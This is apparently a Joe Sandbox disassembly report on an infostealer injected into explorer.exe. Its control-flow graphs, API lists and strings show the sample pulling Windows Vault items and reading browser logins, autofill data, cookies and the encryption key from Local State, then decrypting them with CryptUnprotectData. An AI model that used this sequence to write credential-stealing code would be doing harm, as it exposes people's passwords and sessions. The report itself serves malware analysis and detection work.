                                                                                                                          control_flow_graph 134 2972198-29721c9 RtlZeroMemory GetVersionExW 135 29721d7-29721dc 134->135 136 29721cb-29721d0 134->136 138 29721de 135->138 139 29721e3-29721f6 LoadLibraryW 135->139 137 29721d2 136->137 136->138 137->135 138->139 140 29721fc-297223e GetProcAddress * 5 139->140 141 297249b-29724a3 139->141 142 2972244-297224a 140->142 143 2972492-297249a FreeLibrary 140->143 142->143 144 2972250-2972252 142->144 143->141 144->143 145 2972258-297225a 144->145 145->143 146 2972260-2972265 145->146 146->143 147 297226b-2972277 146->147 148 297227e-2972280 147->148 148->143 149 2972286-29722a5 148->149 151 297248b-297248f 149->151 152 29722ab-29722b3 149->152 151->143 153 2972483 152->153 154 29722b9-29722c5 152->154 153->151 155 29722c9-29722db 154->155 156 2972365-2972375 RtlCompareMemory 155->156 157 29722e1-29722f1 RtlCompareMemory 155->157 158 2972452-2972475 156->158 159 297237b-29723c9 call 2971953 * 3 156->159 157->158 160 29722f7-2972348 call 2971953 * 3 157->160 158->155 163 297247b-297247f 158->163 176 29723e4-29723ea 159->176 177 29723cb-29723dc call 2971953 159->177 160->176 178 297234e-2972363 call 2971953 160->178 163->153 181 2972431-2972433 176->181 182 29723ec-29723ee 176->182 193 29723e0 177->193 178->193 186 2972435-2972437 call 2971011 181->186 187 297243c-297243e 181->187 183 29723f0-29723f2 182->183 184 297242a-297242c call 2971011 182->184 183->184 191 29723f4-29723f6 183->191 184->181 186->187 189 2972447-2972449 187->189 190 2972440-2972442 call 2971011 187->190 189->158 197 297244b-297244d call 2971011 189->197 190->189 191->184 196 29723f8-2972406 StrStrIW 191->196 193->176 198 2972426 196->198 199 2972408-2972421 call 29717c0 * 3 196->199 197->158 198->184 199->198
                                                                                                                          APIs
                                                                                                                          • RtlZeroMemory.NTDLL(?,00000114), ref: 029721AF
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 029721BE
                                                                                                                          • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 029721E8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0297220A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02972214
                                                                                                                          • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02972220
                                                                                                                          • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0297222A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02972236
                                                                                                                          • RtlCompareMemory.NTDLL(?,029D1110,00000010), ref: 029722E8
                                                                                                                          • RtlCompareMemory.NTDLL(?,029D1110,00000010), ref: 0297236C
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                          • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 029723FE
                                                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 02972493
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                          • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                          • API String ID: 2583887280-2831467701
                                                                                                                          • Opcode ID: 5563ea47170f22c00c142011318eb1f8bd3c2d1c6d3a7f9fb6e9718eb66d95d2
                                                                                                                          • Instruction ID: 10eb15621ec14923be44fbf510f2e429b9c76cfe9a4e78c9146b99e832413c4d
                                                                                                                          • Opcode Fuzzy Hash: 5563ea47170f22c00c142011318eb1f8bd3c2d1c6d3a7f9fb6e9718eb66d95d2
                                                                                                                          • Instruction Fuzzy Hash: 46916C71A183059FE718DF65C884A2FBBEABFC8748F10482DF98997251EB71D901CB52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 261 2973098-29730b1 call 2971b6a 264 29730b7-29730cd 261->264 265 29733ba-29733c0 261->265 266 29730e3-2973128 call 2971000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 29c4bec 264->266 267 29730cf-29730d8 call 297302d 264->267 274 297312e-2973146 call 29aeeb8 266->274 275 297339b-29733a4 DeleteFileW call 2971011 266->275 271 29730dd-29730df 267->271 271->266 280 2973392-2973396 call 29c3848 274->280 281 297314c-2973158 call 29902ec 274->281 279 29733a9-29733ab 275->279 279->265 282 29733ad-29733b5 call 2972ffa 279->282 280->275 287 297315e-2973161 281->287 288 2973389-297338d call 298fb92 281->288 282->265 290 2973165-297317f call 2971fa7 287->290 288->280 293 2973185-2973196 290->293 294 297336f-297337b call 29902ec 290->294 295 29732cd-29732e7 CryptUnprotectData 293->295 296 297319c-29731ac RtlCompareMemory 293->296 294->290 303 2973381-2973385 294->303 295->294 300 29732ed-29732f2 295->300 296->295 298 29731b2-29731b4 296->298 298->295 302 29731ba-29731bf 298->302 300->294 301 29732f4-297330a call 2971fa7 300->301 308 297330c-2973312 301->308 309 2973318-297332f call 2971fa7 301->309 302->295 305 29731c5-29731ca 302->305 303->288 305->295 307 29731d0-2973253 RtlZeroMemory call 2971000 305->307 319 2973255-297326b call 2971fa7 307->319 320 29732bd 307->320 308->309 311 2973314 308->311 315 2973331-2973337 309->315 316 297333d-2973343 309->316 311->309 315->316 318 2973339 315->318 321 2973345-297334b 316->321 322 2973351-297336a call 2971798 * 3 316->322 318->316 331 297326d-2973273 319->331 332 2973279-297328e call 2971fa7 319->332 324 29732c1-29732c8 call 2971011 320->324 321->322 325 297334d 321->325 322->294 324->294 325->322 331->332 335 2973275 331->335 339 2973290-2973296 332->339 340 297329c-29732bb call 2971798 * 3 332->340 335->332 339->340 341 2973298 339->341 340->324 341->340
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                            • Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000), ref: 029730F9
                                                                                                                          • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973103
                                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0297310A
                                                                                                                          • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973115
                                                                                                                          • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 029731A4
                                                                                                                          • RtlZeroMemory.NTDLL(?,00000040), ref: 029731D7
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 029732DF
                                                                                                                          • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0297339C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                          • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                          • API String ID: 2757140130-4052020286
                                                                                                                          • Opcode ID: 4949c938a602fb8851b51f78db788e2b2f3383175568637128f7d6384e8b5ed7
                                                                                                                          • Instruction ID: eb8c67fa8b62c5e6ce9307eb4926b2583c563c1aae84a3f20eb4eb0710036b77
                                                                                                                          • Opcode Fuzzy Hash: 4949c938a602fb8851b51f78db788e2b2f3383175568637128f7d6384e8b5ed7
                                                                                                                          • Instruction Fuzzy Hash: 2A91A771608381AFD720DF25C884A3FBBEEAFC5748F44492CF98996290DB35D804DB66

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02973F0A
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02973F16
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62CC), ref: 02973F38
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62D0), ref: 02973F4C
                                                                                                                          • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02973F69
                                                                                                                          • lstrcmpiW.KERNEL32(?,Local State), ref: 02973F7E
                                                                                                                          • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02973F9B
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02973FB5
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02973FC4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                          • String ID: *.*$Local State
                                                                                                                          • API String ID: 3923353463-3324723383
                                                                                                                          • Opcode ID: f4720f3976d5fa15eaf3d276dcf950110430a04049e4cf56c2892d52f5fb9480
                                                                                                                          • Instruction ID: 56e32ec5a5597cc595f09482f77fd8c9ec8de72e39bbae09b5667dfd8ac850ff
                                                                                                                          • Opcode Fuzzy Hash: f4720f3976d5fa15eaf3d276dcf950110430a04049e4cf56c2892d52f5fb9480
                                                                                                                          • Instruction Fuzzy Hash: AE21C2306443446BF714BA318C48A3F77BDEFC6396F24092DF816D2281DB7894189B66

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02972B3D
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62CC), ref: 02972B63
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62D0), ref: 02972B7B
                                                                                                                            • Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4
                                                                                                                          • StrStrIW.SHLWAPI(00000000,logins.json), ref: 02972BE7
                                                                                                                          • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02972C16
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02972C43
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02972C52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                          • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                          • API String ID: 1108783765-3717368146
                                                                                                                          • Opcode ID: 15c8eaf67fc6ef0f08443d4916eabd69aac7333adfe9eb130edf8b9b53dff193
                                                                                                                          • Instruction ID: 8e22cb404720f34811b953cb7d9b5d45bd73f9227c2e74316d6704279f278604
                                                                                                                          • Opcode Fuzzy Hash: 15c8eaf67fc6ef0f08443d4916eabd69aac7333adfe9eb130edf8b9b53dff193
                                                                                                                          • Instruction Fuzzy Hash: 4031B330B183414BEA14AB719898A3F77DFAFC5704F24492CEC4AD3281EB79C9069A52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 531 2971d4a-2971d5c 532 2971eb4-2971ebe 531->532 533 2971d62-2971d66 531->533 533->532 534 2971d6c-2971d77 call 29719b4 533->534 537 2971d8b-2971d97 call 2971953 534->537 538 2971d79-2971d89 call 2971953 534->538 543 2971d9b-2971d9d 537->543 538->543 543->532 544 2971da3-2971db4 FindFirstFileW 543->544 545 2971ead-2971eaf call 2971011 544->545 546 2971dba 544->546 545->532 548 2971dbe-2971dc3 546->548 549 2971dc5-2971dd7 lstrcmpiW 548->549 550 2971e3d-2971e6a call 2971953 call 297199d lstrcmpiW 548->550 552 2971e8e-2971e9c FindNextFileW 549->552 553 2971ddd-2971def lstrcmpiW 549->553 561 2971e87-2971e89 call 2971011 550->561 562 2971e6c-2971e75 call 2971cf7 550->562 552->548 555 2971ea2-2971ea9 FindClose 552->555 553->552 554 2971df5-2971e00 call 29719b4 553->554 563 2971e02-2971e07 554->563 564 2971e09 554->564 555->545 561->552 562->561 570 2971e77-2971e7f 562->570 566 2971e0b-2971e3b call 2971953 call 297199d call 2971d4a 563->566 564->566 566->561 570->561
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02971DA9
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62CC), ref: 02971DCF
                                                                                                                          • lstrcmpiW.KERNEL32(?,029C62D0), ref: 02971DE7
                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 02971E62
                                                                                                                            • Part of subcall function 02971CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02972C27), ref: 02971D02
                                                                                                                            • Part of subcall function 02971CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02971D0D
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02971E94
                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 02971EA3
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
                                                                                                                            • Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
                                                                                                                            • Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                          • String ID: *.*$\*.*
                                                                                                                          • API String ID: 232625764-1692270452
                                                                                                                          • Opcode ID: 6324815252a1c20e4e4a739a240d1782253017b006b4c458ec463d9b82d4f2a2
                                                                                                                          • Instruction ID: cb7a7f2869dfb42f852a0a946a6db9c029b20b649bf712b211b055e8ffb48672
                                                                                                                          • Opcode Fuzzy Hash: 6324815252a1c20e4e4a739a240d1782253017b006b4c458ec463d9b82d4f2a2
                                                                                                                          • Instruction Fuzzy Hash: C131A1307083419BDB20EB349888A7F77EEAFC5240F144A2DE94ED2244EB75C84ACB52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 641 2973e04-2973e11 call 2971b6a 644 2973e17-2973e22 call 2971c31 641->644 645 2973ed4-2973ed8 641->645 644->645 648 2973e28-2973e34 call 2972fb1 644->648 651 2973e3a-2973e4f call 297123b 648->651 652 2973ec8-2973ecc 648->652 655 2973e51-2973e58 651->655 656 2973ec0-2973ec7 call 2971011 651->656 652->645 657 2973ebf 655->657 658 2973e5a-2973e6a 655->658 656->652 657->656 660 2973e6c-2973e7c RtlCompareMemory 658->660 661 2973eb8-2973eba call 2971011 658->661 660->661 663 2973e7e-2973ea6 CryptUnprotectData 660->663 661->657 663->661 665 2973ea8-2973ead 663->665 665->661 666 2973eaf-2973eb3 665->666 666->661
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                            • Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                            • Part of subcall function 02971C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02973E1E,00000000,?,02973FA8), ref: 02971C46
                                                                                                                            • Part of subcall function 02971C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02973FA8), ref: 02971C56
                                                                                                                            • Part of subcall function 02971C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02973FA8), ref: 02971C76
                                                                                                                            • Part of subcall function 02971C31: CloseHandle.KERNELBASE(00000000,?,02973FA8), ref: 02971C91
                                                                                                                            • Part of subcall function 02972FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02973E30,00000000,00000000,?,02973FA8), ref: 02972FC1
                                                                                                                            • Part of subcall function 02972FB1: lstrlen.KERNEL32("encrypted_key":",?,02973FA8), ref: 02972FCE
                                                                                                                            • Part of subcall function 02972FB1: StrStrIA.SHLWAPI("encrypted_key":",029C692C,?,02973FA8), ref: 02972FDD
                                                                                                                            • Part of subcall function 0297123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02973E4B,00000000), ref: 0297124A
                                                                                                                            • Part of subcall function 0297123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971268
                                                                                                                            • Part of subcall function 0297123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971295
                                                                                                                          • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02973E74
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02973E9E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                          • String ID: $DPAP$DPAP$IDPAP
                                                                                                                          • API String ID: 3076719866-957854035
                                                                                                                          • Opcode ID: 12551eb676b80b7664e74af0154db651a8875991f59b7b223b66633ae7dd3681
                                                                                                                          • Instruction ID: 032a9c64ac9449f571a9021d29a2644262e9c0f68d1558b880df7effd68bd9db
                                                                                                                          • Opcode Fuzzy Hash: 12551eb676b80b7664e74af0154db651a8875991f59b7b223b66633ae7dd3681
                                                                                                                          • Instruction Fuzzy Hash: 6021D272604345ABD725EE688880A7FB3DEAFC4704F4409AEF845D7200EF74C9499B96
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.00000000029D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 029D7000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_29d7000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 821cf24f899591603e3a8d22e42fa6a537bd146c7f80bb7294e79dcce0d88396
                                                                                                                          • Instruction ID: 0794da716044a547a17732cca0b99be884a4a2c1e9cff7b5c19d85aaaf5e27a5
                                                                                                                          • Opcode Fuzzy Hash: 821cf24f899591603e3a8d22e42fa6a537bd146c7f80bb7294e79dcce0d88396
                                                                                                                          • Instruction Fuzzy Hash: BEA14AB29547625FE721AF78CCC07A1BBA5EB42224B1C4B7CC9D5CB2C3E7A0640AD751
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0297116F
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02974BB6
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02974BBF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1675517319-0
                                                                                                                          • Opcode ID: c1307e03e7171daa6e1e75963beaabd9f426c1a4a20df08605b78ae347100308
                                                                                                                          • Instruction ID: 1f7734de057e8a480d707006b3c4ccecd327d9cc09e5f7a1b6cd7bdd07c18bfc
                                                                                                                          • Opcode Fuzzy Hash: c1307e03e7171daa6e1e75963beaabd9f426c1a4a20df08605b78ae347100308
                                                                                                                          • Instruction Fuzzy Hash: 4DE0D831905210A7C714BB30BC08B6F3B6EEFC1371F20C92DE159D2081CB318C508E50
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0297116F
                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2580854192-0
                                                                                                                          • Opcode ID: 04fe16900560fce467e315a933f0a2332e43ab4b9615b1a200f28b978536663b
                                                                                                                          • Instruction ID: f449b33fc74280be55b257cd135e1029bec9f57abadeb472b635c067881bf583
                                                                                                                          • Opcode Fuzzy Hash: 04fe16900560fce467e315a933f0a2332e43ab4b9615b1a200f28b978536663b
                                                                                                                          • Instruction Fuzzy Hash: E1C04C72D4926097CA6027A5790CBEA2B1DDF8A267F150881B509A7241CA65885187A1
                                                                                                                          APIs
                                                                                                                          • GetSystemInfo.KERNELBASE(029D20A4,00000001,00000000,0000000A,029C3127,029728DA,00000000,?), ref: 0297BFFC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 31276548-0
                                                                                                                          • Opcode ID: cfb45a92911f1ddd9e8ee6ee69384f5e85b1a38415a384658b44281d07518c3a
                                                                                                                          • Instruction ID: c4a869dbfc546c26218682f02b3dd20b6383e9c54caa30a8971c53cc9b298b70
                                                                                                                          • Opcode Fuzzy Hash: cfb45a92911f1ddd9e8ee6ee69384f5e85b1a38415a384658b44281d07518c3a
                                                                                                                          • Instruction Fuzzy Hash: 3FE01A32BC8B0035F72037F8AC06F5A165E4BC4F00FA08A15BB1DA90C9EBD58180BC26

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                            • Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000), ref: 02973C6A
                                                                                                                          • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973C76
                                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02973C7D
                                                                                                                          • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973C89
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02973D2F
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02973D36
                                                                                                                          • wsprintfA.USER32 ref: 02973D55
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02973D61
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02973D89
                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02973DB2
                                                                                                                          • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02973DED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                          • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                          • API String ID: 2923052733-3488123210
                                                                                                                          • Opcode ID: 705a14db3ddb55ffecfe2c1c75ffcfd284fd0ae0e6ba8c4e3e2726f017477022
                                                                                                                          • Instruction ID: 9dc0ca25f63b7fa63ac4746fcda31ddba4011009b603b157f7eaaf63da58693a
                                                                                                                          • Opcode Fuzzy Hash: 705a14db3ddb55ffecfe2c1c75ffcfd284fd0ae0e6ba8c4e3e2726f017477022
                                                                                                                          • Instruction Fuzzy Hash: C841AD31608241ABD711AB75CC80E3F7BAEEFCA754F10486CF84AA7251DB35D8029B66

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 348 29728f8-29728fa 349 2972900-297291c call 2971000 call 29902ec 348->349 350 2972ac8-2972ada call 29c3848 DeleteFileW call 2971011 348->350 359 2972922-297293a call 2971fa7 349->359 360 2972a8f-2972aa2 call 298fb92 lstrlen 349->360 357 2972adf-2972ae6 350->357 367 297293c-2972942 359->367 368 2972948-297295f call 2971fa7 359->368 365 2972aa4-2972abc call 2971798 * 3 360->365 366 2972ac1-2972ac3 call 2971011 360->366 365->366 366->350 367->368 370 2972944 367->370 375 2972961-2972967 368->375 376 297296d-2972984 call 2971fa7 368->376 370->368 375->376 378 2972969 375->378 383 2972986-297298c 376->383 384 2972992-29729a7 call 2971fa7 376->384 378->376 383->384 385 297298e 383->385 388 29729b5-29729cc call 2971fa7 384->388 389 29729a9-29729af 384->389 385->384 393 29729ce-29729d4 388->393 394 29729da-29729e5 lstrlen 388->394 389->388 390 29729b1 389->390 390->388 393->394 395 29729d6 393->395 396 29729eb-29729f0 lstrlen 394->396 397 2972a79-2972a85 call 29902ec 394->397 395->394 396->397 399 29729f6-2972a11 call 2971000 396->399 397->359 402 2972a8b 397->402 404 2972a13 399->404 405 2972a1b-2972a56 call 2972112 wsprintfA lstrlen 399->405 402->360 404->405 408 2972a6a-2972a74 lstrcat call 2971011 405->408 409 2972a58-2972a68 call 297102f 405->409 408->397 409->408
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02972AD2
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
